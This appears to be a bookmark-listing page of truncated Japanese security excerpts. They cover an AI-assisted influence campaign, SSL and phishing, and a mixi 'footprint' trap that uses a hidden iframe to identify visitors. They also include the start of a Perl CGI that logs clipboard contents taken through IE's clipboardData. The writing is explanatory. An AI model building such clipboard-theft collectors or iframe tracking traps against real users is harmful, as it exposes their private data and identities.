【シリコンバレー=渡辺直樹】米マイクロソフトは8日までに、サイバー攻撃に関する調査報告書を公表した。SNS上で中国の工作員とみられる偽アカウントが生成AI(人工知能)を使い、米国の世論を誘導しようと試みている可能性があると指摘した。2024年の米大統領選に向け、情報操作への警戒感が強まりそうだ。報告書によると、3月ごろから銃規制や特定の政治家など論争になりやすいテーマに焦点を当てた誤情報が増え
![中国のSNS情報操作、米世論誘導狙い Microsoft調査 - 日本経済新聞](https://cdn-ak-scissors.b.st-hatena.com/image/square/10798628b13eb4e88dbee818acb093a3233089cf/height=288;version=1;width=512/https%3A%2F%2Farticle-image-ix.nikkei.com%2Fhttps%253A%252F%252Fimgix-proxy.n8s.jp%252FDSXZQO3816941008092023000000-1.jpg%3Fixlib%3Djs-3.8.0%26auto%3Dformat%252Ccompress%26fit%3Dcrop%26bg%3DFFFFFF%26w%3D1200%26h%3D630%26fp-x%3D0.5%26fp-y%3D0.5%26fp-z%3D1%26crop%3Dfocalpoint%26s%3D424d2beb1ece981a2c9e7c115a8ac9bc)
MIXI足跡トラップのエントリがfladdict.net開始以来の最大トラフィックになって正直ビビッてる。 確かに、MIXIの足跡トラップは、深刻な問題になりえるけれど ちょっと周囲の反応がヒステリックになりすぎてる気がする。 そもそも、今回のMIXIの足跡トラップは ・プロフィールに自分の写真をおかない ・友達にしか連絡先等のリアル情報を見せない設定にする。 ・ハンドル名を実名にしない という一般的な、ネットでのプライバシーに対する処置だけで十分に防げる。 セキュリティホールというよりは、どちらかというとネットカフェでhotmailやamazonからログアウトし忘れた、というレベルの危機管理の問題だと思う。リアル社会で言うならば、援交やっててラブホで免許盗まれたといった類のトラブルであって、普通にネットライフを楽しむる分にはまず問題ない。 だから徹底的なログオフだ、機能廃止だという話の前
というのが可能だと考え付いて、ちょっと愕然とした。 自分のサイトに、隠しiframeでMIXIの自ページを読み込ませておくの。 そうすると、自分のサイトを訪れたログイン中のMIXI会員は、足跡がついちゃうの。あとは定期的に足跡キャッシュする。誰がウチのサイトを見てるかバレバレ(注:実装してないよ)。 一見、アホネタだけど。これ凄いシリアスな問題だよな。だってさ、エロサイトとかにそういう仕組みがあったら、最悪の場合一瞬で個人情報特定されるぜ?サイトのクッキーと、MIXIのアカウントとかが結びつけられた日には、何がおこるかわかったもんじゃないですよ。 100万超過の巨大コミュニティとなった今、MIXIの持っていた知り合いとの人間関係を担保とした安全性ってのは、もうとっくに崩壊してる。さらにザバサーチのようにネット上に分散する情報をかき集めれば、かなりの精度で個人情報が筒抜けになる危険性も増して
最近、何処の会社でもセキュリティに関してうるさく言われているかと思います。自分としても今まで気を遣ってきていたつもりではあります。しかしながら、 なぜSSL利用をケチるのか:IT Pro SSLを入力画面から使用しないのはそろそろ「脆弱性」と判断してしまってよいころかも 安全なWebサイト設計の注意点 を読んでみて、お恥ずかしい限りですが勘違いしていた部分もありました。実際、Amazon とか Yahoo! のログイン画面を見ても、デフォルトが http によるアクセスになっていたりして、メジャーどころでも最新の注意が払われている訳ではないのだなぁ〜と思ったり・・・。本当は全ページ SSL が理想とは知りつつも、SSL の処理負荷の高さ故に、ついついケチったページ遷移にしまうからなのでしょう。。。自分含めて。 自分への情報もかねて、上記ページに記載されている、31箇条の鉄則と最近の事情を加
Eメールから,真正なサイトになりすましたWebサイトに誘導し,IDやパスワードなどの情報を盗み取るのがフィッシングだ。フィッシングによる金銭的な被害は,国内でも2004年9月には発生している(関連記事)。それから1年以上が経つ。Webサイトにとって基本的なフィッシング対策の一つは,SSLをログイン画面から使うこと。しかし,この基本対策をなおざりにしているWebサイトがまだ多い。 SSLならアクセス先を確認できる 一見,暗号化のためのSSLとフィッシング対策とは,関係ないようにも思える。でも実は,SSLには暗号化のほかに,電子証明書で身元を証明するという機能も備わっている。Internet ExplorerなどのWebブラウザで,SSLを使用していることを示す鍵(かぎ)マークをクリックすると,電子証明書が表示される。利用者が意識してこの証明書を確認すれば,アクセス先がどこであるかが判別できる
IE には、便利な機能がある。それは、スクリプト(JavaScript etc..)でクリップボードの操作ができるのだ。clipboardData というオブジェクトね。操作できる内容は、クリップボードにデータを読み込むこと(setData)、読み出すこと(getData)、消去すること(clearData)の3種類。 読み出すことも可能なんですよね。しかも、デフォルトでは、警告すら出ない。 以下のような、プログラムを準備しよう。 #!/usr/bin/perl use strict; my $file = '/tmp/cb.txt'; open (CB, ">> $file"); print CB "$ENV{'QUERY_STRING'}\n"; close (CB); print "Status: 301 Moved Permanently\n"; print "Location:
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く